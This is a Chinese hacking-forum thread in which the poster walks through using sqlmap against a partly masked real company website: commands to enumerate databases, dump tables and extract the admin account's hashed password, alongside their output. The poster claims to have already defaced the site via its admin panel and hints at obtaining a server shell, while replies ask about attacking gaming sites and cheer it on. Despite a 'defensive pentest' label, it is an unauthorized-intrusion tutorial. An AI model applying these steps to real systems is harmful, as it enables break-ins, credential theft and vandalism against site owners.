搜索
查看: 753|回复: 13
收起左侧

[攻防教程] 利用sqlmap进行渗透登录网站后台

[复制链接]

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2022-10-31 21:00:16 | 显示全部楼层 |阅读模式
本帖最后由 LFFOX 于 2022-10-31 21:02 编辑

[以防御为目的的渗透测试]
公司:XX科技集团
域名:XXX.cn
IP:122.XXX.XXX.XX
后台:http://XXXXX.COM/admin/main.php
SQL注入点:http://XXXXX.COM/index_set.php?id=1
数据库: information_schema qdm131253668_db

常识:有id就有可能有sql注入点

~4CN3ZJKGHHI~3CLTV{45}D.png
现在这个站点已经被我从后台篡改了,好废话不多说,开始教程
这个事情其实一个工具就能搞定了
那就是sqlmap
sqlmap是渗透中最常见工具,那具体该怎么使用呢?
[我这里使用的是kali linux 环境自带sqlmap,如果你是在Windows环境可以去sqlmap.org下载,下一节我会发sqlmap的安装教程]
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -dbs
参数解释:-u  指定要扫描的url   -dbs 列出所有数据库
然后我等它扫描完,我这边就出现了下面两个数据库 information_schema qdm131253668_db
不用管不用犹豫,直接选第二个列数据库表
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -D qdm131253668_db --tables --dump

Database: qdm131253668_db                                                                                
[17 tables]
+---------------------+
| calc_params         |
| p_admin             |
| p_comquotation      |
| p_comquotation_base |
| p_comsoftclass      |
| p_config            |
| p_down              |
| p_edusoftclass      |
| p_formula           |
| p_link              |
| p_msg               |
| p_newsbase          |
| p_newsclass         |
| p_newscontent       |
| p_set               |
| products            |
| quotations          |
+---------------------+

这是爆破出来的列表名 仔细看  重点在p_admin列表,一般到这一步,看到ueser_name user admin 这些或者类似这些里面就会有账号和密码
但是这个本身是一个企业网站,就一个管理员账号
走到这一步我们继续往下走
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -D qdm131253668_db -T p_admin --tables --dump
这个结果就有了账号和密码

+-----+------+-----------------+----------------------------------+----------+
| uid | m_id | name            | password                         | username |
+-----+------+-----------------+----------------------------------+----------+
| 1   | 1    | 不告诉你 | 不告诉你 | admin    |
+-----+------+-----------------+----------------------------------+----------+

这里的password和name我就不透露了,username 还是 常见的 admin
不过这里的password进行了md5加密,自己去解密一下就可以了
不要去恶意破坏他人网站
其实sqlmap的利用还有很多,还可以拿服务器的shell等等
自己去摸索吧,本期就到这里了
I'm not a hacker, I'm ... You guess?





上一篇:x86x64软件逆向分析入门
下一篇:sqlmap渗透工具Windows环境安装

该用户从未签到

发表于 2022-10-31 22:32:09 来自手机 | 显示全部楼层
手机可以吗
回复 支持 反对

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

 楼主| 发表于 2022-10-31 22:39:47 | 显示全部楼层

可以,下次出教程
回复 支持 反对

使用道具 举报

签到天数: 126 天

[LV.7]常住居民III

发表于 2022-11-1 00:23:24 来自手机 | 显示全部楼层
这可以渗透CSGO开箱网然后修改东西吗
回复 支持 反对

使用道具 举报

签到天数: 22 天

[LV.4]偶尔看看III

发表于 2022-11-1 03:28:38 来自手机 | 显示全部楼层
525114833 发表于 2022-11-1 00:23
这可以渗透CSGO开箱网然后修改东西吗

可以很刑,哥们加油
回复 支持 反对

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

 楼主| 发表于 2022-11-1 10:32:59 | 显示全部楼层
弥彦 发表于 2022-11-1 03:28
可以很刑,哥们加油

玩玩而已
回复 支持 反对

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

 楼主| 发表于 2022-11-1 10:35:20 | 显示全部楼层
525114833 发表于 2022-11-1 00:23
这可以渗透CSGO开箱网然后修改东西吗

666666666666666666
回复 支持 反对

使用道具 举报

签到天数: 126 天

[LV.7]常住居民III

发表于 2022-11-1 20:42:06 来自手机 | 显示全部楼层
LFFOX 发表于 2022-11-1 10:35
666666666666666666

惩治那些坑钱的人
回复 支持 1 反对 0

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

 楼主| 发表于 2022-11-1 20:56:30 | 显示全部楼层
525114833 发表于 2022-11-1 20:42
惩治那些坑钱的人

哈哈哈,人家也是需要盈利的
回复 支持 0 反对 1

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2022-11-7 21:06:59 来自手机 | 显示全部楼层
LFFOX 发表于 2022-11-1 20:56
哈哈哈,人家也是需要盈利的

大哥有qq吗我有急事求求了
回复 支持 反对

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

 楼主| 发表于 2022-11-7 21:24:45 | 显示全部楼层
2945310027 发表于 2022-11-7 21:06
大哥有qq吗我有急事求求了

我加你?
回复 支持 反对

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2022-11-7 22:46:44 来自手机 | 显示全部楼层
LFFOX 发表于 2022-11-7 21:24
我加你?

大哥加一下我vx可以吗jsryAC
回复 支持 反对

使用道具 举报

签到天数: 1 天

[LV.1]初来乍到

发表于 2023-4-2 21:54:08 | 显示全部楼层
谢谢博主,让我学到了一些这方面的知识,俺学校学的网络安全,但是俺是大专学校很水的,所以特别迷茫,只能在网上学习一下这方面的知识。谢谢博主
回复 支持 反对

使用道具 举报

签到天数: 14 天

[LV.3]偶尔看看II

 楼主| 发表于 2023-4-3 11:13:49 | 显示全部楼层
qq1426542146 发表于 2023-4-2 21:54
谢谢博主,让我学到了一些这方面的知识,俺学校学的网络安全,但是俺是大专学校很水的,所以特别迷茫,只能 ...

这有什么谢的,我也只是一个初中生
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册用户

本版积分规则

快速回复 返回顶部 返回列表